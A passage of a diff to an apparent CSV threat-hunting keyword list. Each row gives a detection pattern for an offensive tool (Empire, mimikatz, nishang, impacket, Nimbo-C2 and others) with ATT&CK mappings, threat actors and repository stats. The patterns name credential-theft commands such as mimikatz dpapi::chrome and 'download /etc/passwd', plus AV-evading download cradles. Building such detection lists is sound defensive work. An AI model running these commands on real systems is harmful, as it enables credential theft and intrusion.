APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" -"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3760","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" +"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z" "*download /etc/passwd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Download:Cradle.js*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*Download_Cradles.*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" -"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Download-Cradles.cmd*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" -"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*DownloadFileImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Downloading */*.tar to /tmp/*.pak*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*downloadMalwareDomains*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*downloads/wapiti-code*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*DownloadString*https://checkip.amazonaws.com*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*dpapi.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*dpapi/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*dpapi::blob*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cache*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::capi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::chrome*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cloudapkd*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cloudapreg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cng*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::create*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::cred*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::credhist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::luna*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::masterkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::protect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::ps*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*dpapi::rdg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 